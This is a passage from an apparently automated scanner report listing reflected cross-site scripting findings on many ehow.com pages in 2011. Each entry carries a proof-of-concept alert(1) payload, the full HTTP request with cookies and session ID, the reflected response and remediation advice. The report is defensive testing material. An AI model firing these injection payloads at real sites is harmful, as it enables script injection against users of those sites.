<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Parenting - How To Information | eHow.com</title> ...[SNIP]... <fb:like href="http://www.ehow.com/parenting/?d92b9'-alert(1)-'0c6c4fea76f=1" ref="like" width="300"> ...[SNIP]...
1.416. http://www.ehow.com/personal-finance/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/personal-finance/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload af06a'-alert(1)-'0adecf09358 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /personal-finance/?af06a'-alert(1)-'0adecf09358=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:55 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72649
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Personal Finance - How To Information | eHow.com< ...[SNIP]... <fb:like href="http://www.ehow.com/personal-finance/?af06a'-alert(1)-'0adecf09358=1" ref="like" width="300"> ...[SNIP]...
1.417. http://www.ehow.com/pets-and-animals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/pets-and-animals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4b3ff'-alert(1)-'99115dd9ab8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:56 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 73362
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Pets & Animals - How To Information | eHow.com</t ...[SNIP]... <fb:like href="http://www.ehow.com/pets-and-animals/?4b3ff'-alert(1)-'99115dd9ab8=1" ref="like" width="300"> ...[SNIP]...
1.418. http://www.ehow.com/plant-care/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/plant-care/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ca0be'-alert(1)-'24a20a51608 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plant-care/?ca0be'-alert(1)-'24a20a51608=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:13:56 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70342
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plant Care - How To Information | eHow.com</title ...[SNIP]... <fb:like href="http://www.ehow.com/plant-care/?ca0be'-alert(1)-'24a20a51608=1" ref="like" width="300"> ...[SNIP]...
1.419. http://www.ehow.com/plants/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/plants/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6081b'-alert(1)-'569f4a88c46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /plants/?6081b'-alert(1)-'569f4a88c46=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:12 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70810
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Plants - How To Information | eHow.com</title>
1.420. http://www.ehow.com/real-estate-and-investment/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/real-estate-and-investment/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53aa7'-alert(1)-'f84def696ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:14 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71097
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Real Estate & Investment - How To Information | e ...[SNIP]... <fb:like href="http://www.ehow.com/real-estate-and-investment/?53aa7'-alert(1)-'f84def696ff=1" ref="like" width="300"> ...[SNIP]...
1.421. http://www.ehow.com/recipes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/recipes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e535'-alert(1)-'5ff63e72f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recipes/?9e535'-alert(1)-'5ff63e72f1=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:13 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 72823
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recipes - How To Information | eHow.com</title>
1.422. http://www.ehow.com/recreational-activities/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/recreational-activities/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6547a'-alert(1)-'db6d13f88f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recreational-activities/?6547a'-alert(1)-'db6d13f88f8=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:12 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70427
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Recreational Activities - How To Information | eH ...[SNIP]... <fb:like href="http://www.ehow.com/recreational-activities/?6547a'-alert(1)-'db6d13f88f8=1" ref="like" width="300"> ...[SNIP]...
1.423. http://www.ehow.com/relationships-and-family/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/relationships-and-family/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 444c6'-alert(1)-'5534980880c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /relationships-and-family/?444c6'-alert(1)-'5534980880c=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:12 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 70621
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Relationships & Family - How To Information | eHo ...[SNIP]... <fb:like href="http://www.ehow.com/relationships-and-family/?444c6'-alert(1)-'5534980880c=1" ref="like" width="300"> ...[SNIP]...
1.424. http://www.ehow.com/sports/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/sports/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ad51'-alert(1)-'d33a740e072 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sports/?1ad51'-alert(1)-'d33a740e072=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:15 GMT Server: Microsoft-IIS/6.0 ETag: X-AspNet-Version: 2.0.50727 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 71169
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title>Sports - How To Information | eHow.com</title>
1.425. http://www.ehow.com/topic_227_take-pictures.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_227_take-pictures.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 590af'-alert(1)-'b3eeb86d5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_227_take-pictures.html?590af'-alert(1)-'b3eeb86d5e9=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.426. http://www.ehow.com/topic_2488_lose-weight.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_2488_lose-weight.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c273d'-alert(1)-'baed76bbb17 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_2488_lose-weight.html?c273d'-alert(1)-'baed76bbb17=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.427. http://www.ehow.com/topic_253_lose-weight-now.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_253_lose-weight-now.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 645b7'-alert(1)-'6bc677f85f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_253_lose-weight-now.html?645b7'-alert(1)-'6bc677f85f8=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.428. http://www.ehow.com/topic_3493_lose-weight-dieting.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_3493_lose-weight-dieting.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 93580'-alert(1)-'755710e4e75 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3493_lose-weight-dieting.html?93580'-alert(1)-'755710e4e75=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.429. http://www.ehow.com/topic_363_winter-sports.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_363_winter-sports.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2604e'-alert(1)-'eed98f4b047 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:14:40 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=363; expires=Thu, 02-Feb-2012 15:14:40 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 49424
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Hit the Slopes for Winter Fitness - Downhill sk ...[SNIP]... <fb:like href="http://www.ehow.com/topic_363_winter-sports.html?2604e'-alert(1)-'eed98f4b047=1" ref="like" width="300"> ...[SNIP]...
1.430. http://www.ehow.com/topic_3818_flu-guide.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_3818_flu-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 39151'-alert(1)-'99641d9590d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3818_flu-guide.html?39151'-alert(1)-'99641d9590d=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.431. http://www.ehow.com/topic_3990_home-security-systems-guide.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_3990_home-security-systems-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9ae0b'-alert(1)-'f561b0ceb97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_3990_home-security-systems-guide.html?9ae0b'-alert(1)-'f561b0ceb97=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
1.432. http://www.ehow.com/topic_401_home-alarms.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_401_home-alarms.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27202'-alert(1)-'bf34bd8751a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Home Alarms - Home Alarm Systems | eHow.com </ ...[SNIP]... <fb:like href="http://www.ehow.com/topic_401_home-alarms.html?27202'-alert(1)-'bf34bd8751a=1" ref="like" width="300"> ...[SNIP]...
1.433. http://www.ehow.com/topic_4028_preparing-flu-season.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_4028_preparing-flu-season.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c72be'-alert(1)-'7ba2f5cfed6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /topic_4028_preparing-flu-season.html?c72be'-alert(1)-'7ba2f5cfed6=1 HTTP/1.1 Host: www.ehow.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: rsi_segs=; __utmz=101451733.1296659524.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); oms=homepage; _dt=ts; __utma=101451733.743339175.1296659524.1296659524.1296659524.1; google-autocomplete=autocomplete; __utmc=101451733; __utmb=101451733.1.10.1296659524; oml=direct; ASP.NET_SessionId=axi0su55dyp0oq45zse1qr55;
Response
HTTP/1.1 200 OK Connection: close Date: Wed, 02 Feb 2011 15:16:52 GMT Server: Microsoft-IIS/6.0 ETag: X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Set-Cookie: recentviewed=4028; expires=Thu, 02-Feb-2012 15:16:52 GMT; path=/ Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 42390
<!DOCTYPE html> <html id="www-ehow-com" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraph.org/schema/"> <head> <title> Preparing for Flu Season | eHow.com </title>
1.434. http://www.ehow.com/topic_4127_home-alarm-system-guide.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.ehow.com
Path:
/topic_4127_home-alarm-system-guide.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8563f'-alert(1)-'3de31e10d00 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
